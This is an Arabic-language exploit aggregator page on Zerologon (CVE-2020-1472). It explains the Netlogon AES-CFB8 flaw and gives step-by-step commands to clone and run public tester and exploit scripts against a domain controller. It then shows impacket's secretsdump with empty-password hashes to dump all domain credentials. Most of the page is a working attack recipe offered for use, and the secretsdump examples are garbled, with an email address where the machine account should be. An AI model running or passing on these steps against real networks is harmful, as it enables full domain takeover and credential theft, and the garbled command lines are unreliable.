## https://sploitus.com/exploit?id=KITPLOIT:TOOLS-GITHUB-MURATAYDEMIR-CVE-2020-1472
**[CVE-2020-1472] تصعيد الامتيازات عبر بروتوكول Netlogon عن بُعد (MS-NRPC) (Zerologon)**
يستغل الهجوم الموضح هنا ثغرات في بروتوكول المصادقة التشفيري (الاستخدام غير الآمن لـ AES-CFB8) الذي يُثبت صحة وهوية جهاز مرتبط بالمجال إلى وحدة تحكم المجال (DC). بسبب الاستخدام غير الصحيح لوضع تشغيل AES، من الممكن تزوير هوية أي حساب جهاز (بما في ذلك حساب DC نفسه) وتعيين كلمة مرور فارغة (ببساطة عن طريق إرسال عدد من رسائل Netlogon حيث يتم ملء الحقول المختلفة بالأصفار) لذلك الحساب في المجال. يمكن بعد ذلك استخدام هذا للحصول على بيانات اعتماد مسؤول المجال ثم استعادة كلمة مرور DC الأصلية.
**من أجل التحقق من CVE-2020-1472**
* git clone https://github.com/SecuraBV/CVE-2020-1472.git
* cd CVE-2020-1472
* python3 -m venv env
* source env/bin/activate
* pip install -r requirements.txt
* python zerologon_tester.py EXAMPLE-DC 1.2.3.4 (مثال: ./zerologon_tester.py DC01 172.16.208.161)
**من أجل استغلال CVE-2020-1472**
* git clone https://github.com/dirkjanm/CVE-2020-1472.git
* cd CVE-2020-1472
* python3 -m venv env
* source env/bin/activate
* python cve-2020-1472-exploit.py EXAMPLE-DC 1.2.3.4 (مثال: ./cve-2020-1472-exploit.py DC01 172.16.208.161)
* git clone https://github.com/SecureAuthCorp/impacket.git
* cd impacket
* pip install .
* python setup.py install
* cd examples
**ثم، قم بتشغيل أحد الأوامر التالية**
**مثال الصيغة 1:** python secretsdump.py domain/example-dc$@fqdn-of-dc
`./secretsdump.py zerologon.local/DC01\some-email@example.com -hashes aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0 -just-dc`
**مثال الصيغة 2:** python secretsdump.py domain/example-dc$@ip-of-dc
`./secretsdump.py zerologon.local/DC01\some-email@example.com -hashes aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0 -just-dc`

المقال الأصلي متاح هنا
المستودع الأصلي الذي يحتوي على نص اختبار بايثون متاح هنا
المستودع الأصلي الذي يحتوي على نص استغلال بايثون متاح هنا